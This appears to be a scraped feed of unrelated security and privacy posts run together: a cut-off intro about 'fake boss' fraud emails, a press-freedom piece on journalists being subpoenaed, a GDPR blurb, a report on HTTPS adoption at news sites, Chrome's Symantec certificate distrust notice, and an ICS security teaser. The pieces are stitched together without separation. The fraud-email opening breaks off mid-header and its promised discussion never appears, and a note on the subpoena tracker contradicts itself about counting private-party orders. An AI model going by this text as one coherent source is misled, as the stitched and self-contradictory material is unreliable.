I see a lot of "fake boss" fraud emails in my day job, but it's rare that I see them sent to my personal email address. These four emails all look like fake boss fraud emails, but there's something more going on here. From:    Ravi [Redacted] Reply-To:    Ravi [Redacted] To: Date:    23 February 2018 at 12:02

An increasing number of journalists have recently faced subpoenas

Wikimedia Commons

In mid-January, two police officers visited the home of documentary filmmaker Nora Donaghy in Los Angeles, showed her a search warrant, and seized her cell phone. She was also subpoenaed to testify in a grand jury trial about her communications with a source.

Three months into 2018, the most under the radar threat to press freedom has shown itself to be not arrests or attacks on journalists, but rather subpoenas to produce documents or attempt to force journalists to testify about their sources.

While few of these cases have made national headlines because the Trump administration has not been involved, journalists in state and local jurisdictions have been subpoenaed to testify in court by government actors five times already this year, in addition to at least five times in 2017. (Update: Shortly after this post was published, Freedom of the Press Foundation became aware of a sixth subpoena in 2018.)

Donaghy’s colleague William Erb was issued a similar subpoena. Although several news organizations have reported that a ruling was made on these subpoenas, no decision has been made public. Additionally, three Chicago-based newspapers—Chicago Sun-TimesChicago Tribune, and Daily Herald— were subpoenaed in January 2018 to produce copies of all stories they had run about the fatal police shooting of teenager Laquan McDonald.

In December 2017, investigative journalist Jamie Kalven was subpoenaed by defense attorneys for a Chicago police officer to testify and reveal details about his sources in the criminal trial of the officer in Cook County, Illinois. A month prior, across the country in San Diego, freelance reporter Kelly Davis was ordered to testify at a deposition by the County of San Diego and turn over unpublished materials used in her reporting. These subpoenas, both of which were later quashed, are just two examples of subpoenas against journalists last year.

(Note: The U.S. Press Freedom Tracker does not count legal orders by private parties, but rather only those issued by government prosecutors or agencies ordering journalists to testify in court. We also count legal orders brought by private parties when government officials subpoena journalists in a private capacity.)

When we launched the U.S. Press Freedom Tracker, we weren’t counting legal actions like subpoenas and prior restraint the way we were arrests. While the Tracker has highlighted each individual instance of assaults and arrests since its inception, we predicted that subpoenas would be less common. The Tracker has only been documenting press freedom violations that have occurred since January 2017, so it’s difficult to make conclusions about the prevalence of subpoenas. But the sudden uptick in subpoenas served on journalists just in the past six months is deeply worrying.

To reflect the frequency and press freedom significance of these subpoenas, we modified the counter on the Tracker’s homepage. Although previously it displayed the number of border stops of journalists, it now shows the number of subpoenas.

Legal action that mandates journalists to turn over their reporting materials or reveal information about their sources is always concerning. Investigative journalism, and journalism that challenges power, requires the ability of journalists to keep their sources and reporting processes confidential—especially in the face of legal process.

“A democracy requires a free flow of information to the public.  But if a journalist may be forced to disclose the identity of a confidential source, then potential whistleblowers who are concerned about maintaining their anonymity will be less likely to come forward with important information about government or corporate misconduct. So ultimately the public loses out on this valuable information, and the health of our democracy suffers,” says Sarah Matthews, Staff Attorney at Reporters Committee for Freedom of the Press.

It’s a decades-old problem. Journalists have, since the 1970s, gone to jail rather than give up their sources in court. In response, thankfully, many states have “press shield” or “reporter’s privilege” laws. Such laws, which exist in approximately 40 states, aim to provide at least some protection for journalists to avoid testifying about their sources or information that they obtained as part of their newsgathering processes.

Unfortunately, not every state has such laws, and many reporter’s privilege statutes were written decades ago and are not longer adequate in the digital age. While the prospect for passing a strong federal shield law faces increasingly long odds (and could potentially have unintended consequences for press freedom), state legislatures can provide important protections to journalists by updating or passing new press shield laws that take into account the shifting nature of online journalism.

Subpoenaing for journalists’ confidential information may be a long-standing problem, but at least on the state and local level, not one that will be going away anytime soon. We’ll continue to systematically document every such incident with the U.S. Press Freedom Tracker as long as the practice persists.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shakeup since the dawn of the internet and it is just weeks before it comes into force on 25th May. GDPR comes with potentially head-spinning financial penalties for businesses found not complying, so it really is essential for any business which touches EU citizen's personal data, to thoroughly do their privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

How secure are news sites? A report from the first year of Secure The News

Header from the Secure The News project

For over a year now, Secure The News has automatically monitored the HTTPS encryption practices at more than 100 major news sites around the world. Secure The News is a Freedom of the Press Foundation project built to regularly update a scorecard of some 131 news sites. We encourage sites to climb up those rankings because well-configured HTTPS encryption can protect reader privacy, enhance site security, and make important reporting harder to censor or manipulate.

We're pleased to report that since we began monitoring in late 2016, HTTPS encryption has seen a pronounced increase in the quality and reach of its deployment among news sites, and we continue to improve the tools we use to monitor that rise.

Let's start with the stats. We can see the overall rise in HTTPS deployment and quality by monitoring the "grades" we give sites based on their use of HTTPS. Each dot on this graph represents a the grade from a sampled scan, while the line shows the average grade over time. That grade, out of 100, has risen from about 31 points at the end of 2016 to over 53 points now. A major improvement, to be sure, but with plenty of room to get better.

Chart showing average and a sample of grades from Secure The News scans

In several key categories, we've compared our very first evaluation of the 131 news sites we monitor with the most recent.

  • HTTPS encryption is available on two-thirds of sites we're monitoring—89 of 131. That's up from just over one-third, or 48 sites, when we first ran tests starting in late November 2016.

  • Nearly 60% now offer HTTPS encryption by default. That's up from just 22% on our first scans—a massive leap in under 18 months.

  • Another exciting development for the nerds: the use of HSTS (HTTP strict transport security), which aims to keep browsers from ever using an insecure connection, is way up: From just 9% of sites in our first scans to up over 25% now.

In our first year of running Secure The News, we've made a few key improvements to the site as well.

In early 2017 we created a Twitter bot that would post changes to the scorecard each weekday. Now whenever a site turns on HTTPS—or improves their HTTPS security, which readers might not otherwise spot—we post a tweet detailing the change.

We also released the code powering Secure The News as a free software project in February 2017. It is licensed under the GNU AGPL software license, which means improvements made by other people using the software can be folded back into our code.

Finally, we added an API for accessing current and historical scan data. That API was used to collect the statistics in this post and currently powers the Twitter bot. We’ll provide more information about the API, and about other new developments to Secure the News, in the near future.

Strong, well-configured HTTPS encryption is a must-have for news sites operating on the modern Web, and it’s heartening that the first year of Secure The News has recorded so many improvements on that front. Press freedom must include the ability to read free from surveillance, censorship, or manipulation, and we’ll continue to push news sites to take the important technical steps necessary to achieve that goal.

Distrust of the Symantec PKI: Immediate action needed by site operators

Update October 17, 2018Chrome 70 has now been released to the Stable Channel, and users will start to see full screen interstitials on sites which still use certificates issues by the Legacy Symantec PKI. Initially this change will reach a small percentage of users, and then slowly scale up to 100% over the next several weeks.

Site Operators receiving problem reports from users are strongly encouraged to take corrective action by replacing their website certificates as soon as possible. Instructions on how to determine whether your site is affected as well as what corrective action is needed can be found below.

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using a SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 

The DevTools message you will see if you need to replace your certificate before Chrome 66.
Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.

The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
First Canary
First Beta
Stable Release
Chrome 66
January 20, 2018
~ March 15, 2018
~ April 17, 2018
Chrome 70
~ July 20, 2018
~ September 13, 2018
~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users. See this Enterprise Help Center article for more information.

Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering in to special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.

Insecure by design: What you need to know about defending critical infrastructure

Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.

To read this article in full, please click here